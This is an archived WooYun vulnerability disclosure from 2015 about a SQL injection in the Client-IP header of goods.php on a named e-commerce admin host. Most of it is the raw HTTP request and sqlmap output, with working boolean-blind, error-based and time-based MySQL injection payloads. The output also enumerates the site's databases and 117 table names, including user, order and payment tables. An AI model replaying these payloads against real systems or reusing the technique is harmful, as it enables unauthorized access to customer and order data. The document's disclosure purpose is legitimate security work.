乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-08: 细节已通知厂商并且等待厂商处理中 2015-05-13: 厂商已经主动忽略漏洞,细节向公众公开
http://newadmin.newman.mobi
GET /goods.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Client-IP: *Cookie: PHPSESSID=pth8dqd7i7tfchv4fk4qashtn0; ECS[history]=35%2C75%2C116; ECS[display]=gridHost: newadmin.newman.mobiConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*
Client-IP参数有问题~
库:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: (custom) HEADERParameter: Client-IP #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: '||(SELECT 'xhFK' FROM DUAL WHERE 3543=3543 AND 6833=6833)||' Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: '||(SELECT 'FSJj' FROM DUAL WHERE 8829=8829 AND (SELECT 1013 FROM(SELECT COUNT(*),CONCAT(0x716e676271,(SELECT (CASE WHEN (1013=1013) THEN 1 ELSE 0 END)),0x717a737971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||' Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: '||(SELECT 'CjFf' FROM DUAL WHERE 6813=6813 AND SLEEP(5))||'---back-end DBMS: MySQL 5.0available databases [6]:[*] information_schema[*] mysql[*] newsmy-bbs[*] newsmy-uc[*] newsmy-www[*] performance_schema
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: (custom) HEADERParameter: Client-IP #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: '||(SELECT 'xhFK' FROM DUAL WHERE 3543=3543 AND 6833=6833)||' Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: '||(SELECT 'FSJj' FROM DUAL WHERE 8829=8829 AND (SELECT 1013 FROM(SELECT COUNT(*),CONCAT(0x716e676271,(SELECT (CASE WHEN (1013=1013) THEN 1 ELSE 0 END)),0x717a737971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||' Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: '||(SELECT 'CjFf' FROM DUAL WHERE 6813=6813 AND SLEEP(5))||'---back-end DBMS: MySQL 5.0Database: newsmy-www[117 tables]+---------------------------+| apptemp || ecs_account_log || ecs_ad || ecs_ad_custom || ecs_ad_position || ecs_admin_action || ecs_admin_log || ecs_admin_message || ecs_admin_user || ecs_adsense || ecs_affiliate_log || ecs_agency || ecs_area_region || ecs_article || ecs_article_cat || ecs_attribute || ecs_auction_log || ecs_auto_manage || ecs_back_goods || ecs_back_order || ecs_bonus_type || ecs_booking_goods || ecs_brand || ecs_card || ecs_cart || ecs_cat_recommend || ecs_category || ecs_collect_goods || ecs_comment || ecs_crons || ecs_delivery_goods || ecs_delivery_order || ecs_email_list || ecs_email_sendlist || ecs_error_log || ecs_exchange_goods || ecs_favourable_activity || ecs_feedback || ecs_fm || ecs_friend_link || ecs_goods || ecs_goods_activity || ecs_goods_article || ecs_goods_attr || ecs_goods_cat || ecs_goods_copy || ecs_goods_gallery || ecs_goods_type || ecs_group_goods || ecs_keywords || ecs_link_goods || ecs_mail_templates || ecs_member_price || ecs_miaosha || ecs_miaosha_0401 || ecs_miaosha_copy || ecs_nav || ecs_order_action || ecs_order_action_04012020 || ecs_order_goods || ecs_order_goods_04012020 || ecs_order_goods_copy || ecs_order_info || ecs_order_info_04012020 || ecs_order_info_14 || ecs_order_info_copy0819 || ecs_order_info_copy1 || ecs_order_info_copy2 || ecs_order_info_copy3 || ecs_pack || ecs_package_goods || ecs_pay_log || ecs_pay_log_04012020 || ecs_payment || ecs_plugins || ecs_products || ecs_reg_extend_info || ecs_reg_fields || ecs_region || ecs_role || ecs_searchengine || ecs_sessions || ecs_sessions_data || ecs_shipping || ecs_shipping_area || ecs_shop_config || ecs_snatch_log || ecs_stats || ecs_suppliers || ecs_tag || ecs_template || ecs_topic || ecs_user_account || ecs_user_address || ecs_user_bonus || ecs_user_feed || ecs_user_rank || ecs_users || ecs_users_copy || ecs_virtual_card || ecs_volume_price || ecs_vote || ecs_vote_log || ecs_vote_option || ecs_weibo || ecs_wholesale || ecs_yuding || ecs_yuding_140121 || ecs_yuding_copy || ecs_yuding_dj || ecs_yuding_pay || order_info || session_mem || session_wcore || temp_user || yd1111 || yuding |+---------------------------+
用户信息:
取某些关键字段看看:
订单信息:
危害等级:无影响厂商忽略
忽略时间:2015-05-13 11:12
漏洞Rank:15 (WooYun评价)
暂无